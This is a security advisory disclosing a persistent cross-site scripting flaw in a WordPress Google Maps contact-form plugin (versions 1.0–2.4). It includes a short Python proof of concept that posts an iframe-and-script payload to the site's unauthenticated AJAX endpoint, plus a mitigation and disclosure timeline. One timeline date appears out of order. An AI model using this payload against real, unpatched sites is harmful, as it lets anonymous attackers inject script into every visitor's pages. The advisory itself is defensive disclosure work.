Contact Form Integrated With Google Maps 1.0 - 2.4, Persistent XSS

Due to exposing an AJAX function to anonymous users by using the ‘nopriv’ method of adding an AJAX action, anonymous users are able to insert arbitrary HTML / Javascript onto the site globally.

Homepage

https://wordpress.org/plugins/contact-form-integrated-with-google-maps/

CVSS Score

6.4

CSSS Vector

(AV:N/AC:L/Au:N/C:P/I:P/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 2.5

Proof of Concept

The following Python script will result arbitrary Javascript being executed on page load. Any custom HTML content can be inserted into the ‘value’ field, so long as an ‘iframe’ element exists in the provided data

import requests
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
	"action":"master_response",
	"value":"<iframe></iframe><script>alert('.');</script>"}
r = requests.post(url, data=payload)

Timeline

  • 2014-09-22: Discovered
  • 2014-09-22: Reported to vendor
  • 2014-09-22: Vendor responded with intent to fix
  • 2014-09-29: Update requested from vendor
  • 2014-09-30: CVE requested
  • 2014-09-02: CVE assigned
  • 2014-10-06: Update requested from vendor
  • 2014-10-11: 2.5 released – issue resolved
  • 2014-10-18: Advisory released